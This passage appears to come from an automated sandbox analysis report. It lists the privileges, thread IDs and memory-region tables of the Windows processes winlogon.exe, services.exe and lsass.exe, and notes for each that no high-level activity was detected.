| bcryptprimitives.dll | 0x7ffc543d0000 | 0x7ffc5443afff | Memory Mapped File | rwx |
|
|
|
- |
| sxs.dll | 0x7ffc54440000 | 0x7ffc544d7fff | Memory Mapped File | rwx |
|
|
|
- |
| sxssrv.dll | 0x7ffc544f0000 | 0x7ffc544fcfff | Memory Mapped File | rwx |
|
|
|
- |
| winsrv.dll | 0x7ffc54500000 | 0x7ffc54534fff | Memory Mapped File | rwx |
|
|
|
- |
| basesrv.dll | 0x7ffc54540000 | 0x7ffc54553fff | Memory Mapped File | rwx |
|
|
|
- |
| csrsrv.dll | 0x7ffc54560000 | 0x7ffc54574fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc55040000 | 0x7ffc5521cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffc554e0000 | 0x7ffc5562dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc55800000 | 0x7ffc558acfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffc56f10000 | 0x7ffc57094fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc570a0000 | 0x7ffc571c5fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 18 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #46: winlogon.exe
0
0
| Information | Value |
|---|---|
| ID | #46 |
| File Name | c:\windows\system32\winlogon.exe |
| Command Line | winlogon.exe |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1cc |
| Parent PID | 0xffffffffffffffff (Unknown) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeTcbPrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
FE8
0x
2DC
0x
2C0
0x
208
0x
1FC
0x
1D0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00000054567f0000 | 0x54567f0000 | 0x54567fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000005456800000 | 0x5456800000 | 0x5456806fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005456810000 | 0x5456810000 | 0x5456823fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005456830000 | 0x5456830000 | 0x54568affff | Private Memory | rw |
|
|
|
- |
| private_0x00000054568b0000 | 0x54568b0000 | 0x545692ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005456930000 | 0x5456930000 | 0x5456936fff | Private Memory | rw |
|
|
|
- |
| user32.dll.mui | 0x5456940000 | 0x5456944fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000005456950000 | 0x5456950000 | 0x5456a4ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x5456a50000 | 0x5456b0dfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000005456b10000 | 0x5456b10000 | 0x5456c97fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005456ca0000 | 0x5456ca0000 | 0x5456ca0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005456cb0000 | 0x5456cb0000 | 0x5456cb0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005456ce0000 | 0x5456ce0000 | 0x5456ceffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005456cf0000 | 0x5456cf0000 | 0x5456e70fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005456e80000 | 0x5456e80000 | 0x5456efffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005456f00000 | 0x5456f00000 | 0x5456f7ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005456f80000 | 0x5456f80000 | 0x5456faffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000005456fb0000 | 0x5456fb0000 | 0x5456fd9fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000005457070000 | 0x5457070000 | 0x5457087fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005457090000 | 0x5457090000 | 0x545710ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005457110000 | 0x5457110000 | 0x545711ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005457120000 | 0x5457120000 | 0x545719ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005457280000 | 0x5457280000 | 0x5457400fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000005457410000 | 0x5457410000 | 0x545880ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x5458810000 | 0x5458b46fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000005458b50000 | 0x5458b50000 | 0x5458c4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005458c50000 | 0x5458c50000 | 0x5459141fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ffe90000 | 0x7df5ffe90000 | 0x7ff5ffe8ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff7a562c000 | 0x7ff7a562c000 | 0x7ff7a562dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7a562e000 | 0x7ff7a562e000 | 0x7ff7a562ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff7a5630000 | 0x7ff7a5630000 | 0x7ff7a572ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff7a5730000 | 0x7ff7a5730000 | 0x7ff7a5752fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff7a5756000 | 0x7ff7a5756000 | 0x7ff7a5757fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7a5758000 | 0x7ff7a5758000 | 0x7ff7a5759fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7a575a000 | 0x7ff7a575a000 | 0x7ff7a575bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7a575c000 | 0x7ff7a575c000 | 0x7ff7a575dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7a575e000 | 0x7ff7a575e000 | 0x7ff7a575efff | Private Memory | rw |
|
|
|
- |
| winlogon.exe | 0x7ff7a5d20000 | 0x7ff7a5db2fff | Memory Mapped File | rwx |
|
|
|
- |
| usermgrcli.dll | 0x7ffc51410000 | 0x7ffc5141ffff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x7ffc52cd0000 | 0x7ffc52d47fff | Memory Mapped File | rwx |
|
|
|
- |
| dwminit.dll | 0x7ffc52d50000 | 0x7ffc52d62fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7ffc52d70000 | 0x7ffc52e05fff | Memory Mapped File | rwx |
|
|
|
- |
| uxinit.dll | 0x7ffc52f20000 | 0x7ffc52f38fff | Memory Mapped File | rwx |
|
|
|
- |
| winsta.dll | 0x7ffc53720000 | 0x7ffc53777fff | Memory Mapped File | rwx |
|
|
|
- |
| mpr.dll | 0x7ffc53810000 | 0x7ffc5382bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x7ffc53920000 | 0x7ffc53951fff | Memory Mapped File | rwx |
|
|
|
- |
| dpapi.dll | 0x7ffc541f0000 | 0x7ffc541f9fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffc54280000 | 0x7ffc5428afff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ffc54320000 | 0x7ffc5434bfff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffc543a0000 | 0x7ffc543c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffc543d0000 | 0x7ffc5443afff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffc54580000 | 0x7ffc54592fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffc545a0000 | 0x7ffc545e9fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7ffc545f0000 | 0x7ffc54600fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7ffc54db0000 | 0x7ffc54f70fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ffc54f80000 | 0x7ffc55032fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc55040000 | 0x7ffc5521cfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ffc55280000 | 0x7ffc552b5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc552c0000 | 0x7ffc5535cfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ffc55380000 | 0x7ffc554dbfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffc554e0000 | 0x7ffc5562dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc55800000 | 0x7ffc558acfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffc56f10000 | 0x7ffc57094fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc570a0000 | 0x7ffc571c5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffc571d0000 | 0x7ffc5744bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffc57540000 | 0x7ffc5759afff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffc57aa0000 | 0x7ffc57b45fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
Process #47: services.exe
0
0
| Information | Value |
|---|---|
| ID | #47 |
| File Name | c:\windows\system32\services.exe |
| Command Line | C:\Windows\system32\services.exe |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1e4 |
| Parent PID | 0x194 (c:\windows\system32\wininit.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
348
0x
28C
0x
258
0x
244
0x
238
0x
41C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00000081b3270000 | 0x81b3270000 | 0x81b327ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| services.exe.mui | 0x81b3280000 | 0x81b3284fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000081b3290000 | 0x81b3290000 | 0x81b32a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000081b3330000 | 0x81b3330000 | 0x81b3333fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000081b3340000 | 0x81b3340000 | 0x81b3340fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x81b3350000 | 0x81b340dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000081b3490000 | 0x81b3490000 | 0x81b350ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000081b3510000 | 0x81b3510000 | 0x81b3510fff | Private Memory | rw |
|
|
|
- |
| private_0x00000081b3530000 | 0x81b3530000 | 0x81b3536fff | Private Memory | rw |
|
|
|
- |
| private_0x00000081b3540000 | 0x81b3540000 | 0x81b35bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000081b35f0000 | 0x81b35f0000 | 0x81b35f6fff | Private Memory | rw |
|
|
|
- |
| private_0x00000081b3600000 | 0x81b3600000 | 0x81b36fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000081b3700000 | 0x81b3700000 | 0x81b37fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000081b3800000 | 0x81b3800000 | 0x81b387ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000081b3880000 | 0x81b3880000 | 0x81b38fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000081b3a80000 | 0x81b3a80000 | 0x81b3afffff | Private Memory | rw |
|
|
|
- |
| private_0x00000081b3c00000 | 0x81b3c00000 | 0x81b3cfffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff330000 | 0x7df5ff330000 | 0x7ff5ff32ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff77b416000 | 0x7ff77b416000 | 0x7ff77b417fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff77b41e000 | 0x7ff77b41e000 | 0x7ff77b41ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff77b420000 | 0x7ff77b420000 | 0x7ff77b51ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff77b520000 | 0x7ff77b520000 | 0x7ff77b542fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff77b544000 | 0x7ff77b544000 | 0x7ff77b545fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff77b546000 | 0x7ff77b546000 | 0x7ff77b547fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff77b548000 | 0x7ff77b548000 | 0x7ff77b548fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff77b54a000 | 0x7ff77b54a000 | 0x7ff77b54bfff | Private Memory | rw |
|
|
|
- |
| services.exe | 0x7ff77b970000 | 0x7ff77b9dffff | Memory Mapped File | rwx |
|
|
|
- |
| usermgrcli.dll | 0x7ffc51410000 | 0x7ffc5141ffff | Memory Mapped File | rwx |
|
|
|
- |
| authz.dll | 0x7ffc53640000 | 0x7ffc53687fff | Memory Mapped File | rwx |
|
|
|
- |
| scesrv.dll | 0x7ffc53690000 | 0x7ffc5371dfff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x7ffc53840000 | 0x7ffc53865fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x7ffc53dd0000 | 0x7ffc53e2cfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ffc54320000 | 0x7ffc5434bfff | Memory Mapped File | rwx |
|
|
|
- |
| spinf.dll | 0x7ffc54350000 | 0x7ffc5436afff | Memory Mapped File | rwx |
|
|
|
- |
| eventaggregation.dll | 0x7ffc54370000 | 0x7ffc54389fff | Memory Mapped File | rwx |
|
|
|
- |
| dabapi.dll | 0x7ffc54390000 | 0x7ffc54397fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffc543d0000 | 0x7ffc5443afff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffc54580000 | 0x7ffc54592fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc55040000 | 0x7ffc5521cfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc552c0000 | 0x7ffc5535cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc55800000 | 0x7ffc558acfff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7ffc56f00000 | 0x7ffc56f07fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc570a0000 | 0x7ffc571c5fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffc57540000 | 0x7ffc5759afff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7ffc57900000 | 0x7ffc57968fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
Process #48: lsass.exe
0
0
| Information | Value |
|---|---|
| ID | #48 |
| File Name | c:\windows\system32\lsass.exe |
| Command Line | C:\Windows\system32\lsass.exe |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1ec |
| Parent PID | 0x194 (c:\windows\system32\wininit.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeCreateTokenPrivilege, SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
65C
0x
868
0x
228
0x
220
0x
21C
0x
218
0x
214
0x
1F0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000a36a630000 | 0xa36a630000 | 0xa36a63ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000a36a640000 | 0xa36a640000 | 0xa36a640fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000a36a650000 | 0xa36a650000 | 0xa36a663fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000a36a670000 | 0xa36a670000 | 0xa36a6effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000a36a6f0000 | 0xa36a6f0000 | 0xa36a6f3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000a36a700000 | 0xa36a700000 | 0xa36a700fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000a36a710000 | 0xa36a710000 | 0xa36a711fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0xa36a720000 | 0xa36a7ddfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000a36a7e0000 | 0xa36a7e0000 | 0xa36a7e0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000a36a7f0000 | 0xa36a7f0000 | 0xa36a7fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| lsasrv.dll.mui | 0xa36a800000 | 0xa36a80afff | Memory Mapped File | r |
|
|
|
- |
| msprivs.dll | 0xa36a810000 | 0xa36a812fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000a36a820000 | 0xa36a820000 | 0xa36a82ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000a36a830000 | 0xa36a830000 | 0xa36a830fff | Private Memory | rw |
|
|
|
- |
| private_0x000000a36a840000 | 0xa36a840000 | 0xa36a846fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000a36a850000 | 0xa36a850000 | 0xa36a851fff | Pagefile Backed Memory | rw |
|
|
|
- |
| c_28591.nls | 0xa36a8d0000 | 0xa36a8e0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000a36a8f0000 | 0xa36a8f0000 | 0xa36a8f0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000a36a900000 | 0xa36a900000 | 0xa36a9fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000a36aa00000 | 0xa36aa00000 | 0xa36aa7ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000a36aa80000 | 0xa36aa80000 | 0xa36aa80fff | Private Memory | rw |
|
|
|
- |
| private_0x000000a36aa90000 | 0xa36aa90000 | 0xa36aa90fff | Private Memory | rw |
|
|
|
- |
| private_0x000000a36aaa0000 | 0xa36aaa0000 | 0xa36aaa0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000a36aab0000 | 0xa36aab0000 | 0xa36aab0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000a36aac0000 | 0xa36aac0000 | 0xa36aac0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000a36aad0000 | 0xa36aad0000 | 0xa36aad0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000a36aae0000 | 0xa36aae0000 | 0xa36aae6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000a36aaf0000 | 0xa36aaf0000 | 0xa36aaf0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000a36ab00000 | 0xa36ab00000 | 0xa36abfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000a36ac00000 | 0xa36ac00000 | 0xa36ac7ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000a36ac80000 | 0xa36ac80000 | 0xa36acfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000a36ad00000 | 0xa36ad00000 | 0xa36ad7ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0xa36ad80000 | 0xa36b0b6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000a36b0c0000 | 0xa36b0c0000 | 0xa36b13ffff | Private Memory | rw |
|
|
|
- |
| vaultsvc.dll.mui | 0xa36b1c0000 | 0xa36b1c0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000a36b1d0000 | 0xa36b1d0000 | 0xa36b2cffff | Private Memory | rw |
|
|
|
- |
| dnsapi.dll.mui | 0xa36b2e0000 | 0xa36b2f1fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000a36b300000 | 0xa36b300000 | 0xa36b3fffff | Private Memory | rw |
|
|
|
- |
| crypt32.dll.mui | 0xa36b410000 | 0xa36b419fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000a36b420000 | 0xa36b420000 | 0xa36b49ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ffea0000 | 0x7df5ffea0000 | 0x7ff5ffe9ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff6a56c8000 | 0x7ff6a56c8000 | 0x7ff6a56c9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6a56cc000 | 0x7ff6a56cc000 | 0x7ff6a56cdfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6a56ce000 | 0x7ff6a56ce000 | 0x7ff6a56cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff6a56d0000 | 0x7ff6a56d0000 | 0x7ff6a57cffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff6a57d0000 | 0x7ff6a57d0000 | 0x7ff6a57f2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff6a57f4000 | 0x7ff6a57f4000 | 0x7ff6a57f5fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6a57f6000 | 0x7ff6a57f6000 | 0x7ff6a57f7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6a57f8000 | 0x7ff6a57f8000 | 0x7ff6a57f8fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6a57fa000 | 0x7ff6a57fa000 | 0x7ff6a57fbfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6a57fe000 | 0x7ff6a57fe000 | 0x7ff6a57fffff | Private Memory | rw |
|
|
|
- |
| lsass.exe | 0x7ff6a6590000 | 0x7ff6a659ffff | Memory Mapped File | rwx |
|
|
|
- |
| mskeyprotect.dll | 0x7ffc42390000 | 0x7ffc423a3fff | Memory Mapped File | rwx |
|
|
|
- |
| dssenh.dll | 0x7ffc423b0000 | 0x7ffc423d7fff | Memory Mapped File | rwx |
|
|
|
- |
| ncryptprov.dll | 0x7ffc423e0000 | 0x7ffc42438fff | Memory Mapped File | rwx |
|
|
|
- |
| ncryptsslp.dll | 0x7ffc42440000 | 0x7ffc4245efff | Memory Mapped File | rwx |
|
|
|
- |
| vaultsvc.dll | 0x7ffc50640000 | 0x7ffc50692fff | Memory Mapped File | rwx |
|
|
|
- |
| fvecerts.dll | 0x7ffc507b0000 | 0x7ffc507bbfff | Memory Mapped File | rwx |
|
|
|
- |
| fveapi.dll | 0x7ffc507c0000 | 0x7ffc5087dfff | Memory Mapped File | rwx |
|
|
|
- |
| wevtapi.dll | 0x7ffc519c0000 | 0x7ffc51a24fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x7ffc51c30000 | 0x7ffc51c3afff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x7ffc51c50000 | 0x7ffc51c87fff | Memory Mapped File | rwx |
|
|
|
- |
| gpapi.dll | 0x7ffc534a0000 | 0x7ffc534c2fff | Memory Mapped File | rwx |
|
|
|
- |
| winsta.dll | 0x7ffc53720000 | 0x7ffc53777fff | Memory Mapped File | rwx |
|
|
|
- |
| scecli.dll | 0x7ffc53780000 | 0x7ffc537cafff | Memory Mapped File | rwx |
|
|
|
- |
| dpapisrv.dll | 0x7ffc537d0000 | 0x7ffc53804fff | Memory Mapped File | rwx |
|
|
|
- |
| mpr.dll | 0x7ffc53810000 | 0x7ffc5382bfff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x7ffc53830000 | 0x7ffc5383bfff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x7ffc53840000 | 0x7ffc53865fff | Memory Mapped File | rwx |
|
|
|
- |
| efslsaext.dll | 0x7ffc53870000 | 0x7ffc5388ffff | Memory Mapped File | rwx |
|
|
|
- |
| tbs.dll | 0x7ffc53890000 | 0x7ffc5389cfff | Memory Mapped File | rwx |
|
|
|
- |
| pcptpm12.dll | 0x7ffc538a0000 | 0x7ffc5391afff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x7ffc53920000 | 0x7ffc53951fff | Memory Mapped File | rwx |
|
|
|
- |
| pcpksp.dll | 0x7ffc53960000 | 0x7ffc53978fff | Memory Mapped File | rwx |
|
|
|
- |
| schannel.dll | 0x7ffc53980000 | 0x7ffc539f3fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoftaccountcloudap.dll | 0x7ffc53a00000 | 0x7ffc53a44fff | Memory Mapped File | rwx |
|
|
|
- |
| cloudap.dll | 0x7ffc53a50000 | 0x7ffc53a81fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffc53a90000 | 0x7ffc53ac2fff | Memory Mapped File | rwx |
|
|
|
- |
| wdigest.dll | 0x7ffc53ad0000 | 0x7ffc53b0afff | Memory Mapped File | rwx |
|
|
|
- |
| pku2u.dll | 0x7ffc53b10000 | 0x7ffc53b57fff | Memory Mapped File | rwx |
|
|
|
- |
| tspkg.dll | 0x7ffc53b60000 | 0x7ffc53b7bfff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7ffc53b80000 | 0x7ffc53b9efff | Memory Mapped File | rwx |
|
|
|
- |
| logoncli.dll | 0x7ffc53ba0000 | 0x7ffc53bddfff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x7ffc53be0000 | 0x7ffc53c87fff | Memory Mapped File | rwx |
|
|
|
- |
| netlogon.dll | 0x7ffc53c90000 | 0x7ffc53d61fff | Memory Mapped File | rwx |
|
|
|
- |
| msv1_0.dll | 0x7ffc53d70000 | 0x7ffc53dcefff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x7ffc53dd0000 | 0x7ffc53e2cfff | Memory Mapped File | rwx |
|
|
|
- |
| kerberos.dll | 0x7ffc53e30000 | 0x7ffc53f23fff | Memory Mapped File | rwx |
|
|
|
- |
| ntasn1.dll | 0x7ffc53f30000 | 0x7ffc53f65fff | Memory Mapped File | rwx |
|
|
|
- |
| ncrypt.dll | 0x7ffc53f70000 | 0x7ffc53f95fff | Memory Mapped File | rwx |
|
|
|
- |
| samsrv.dll | 0x7ffc53fa0000 | 0x7ffc54075fff | Memory Mapped File | rwx |
|
|
|
- |
| lsasrv.dll | 0x7ffc54080000 | 0x7ffc541e3fff | Memory Mapped File | rwx |
|
|
|
- |
| dpapi.dll | 0x7ffc541f0000 | 0x7ffc541f9fff | Memory Mapped File | rwx |
|
|
|
- |
| ntlmshared.dll | 0x7ffc54200000 | 0x7ffc5420afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffc54210000 | 0x7ffc54226fff | Memory Mapped File | rwx |
|
|
|
- |
| kerbclientshared.dll | 0x7ffc54230000 | 0x7ffc54257fff | Memory Mapped File | rwx |
|
|
|
- |
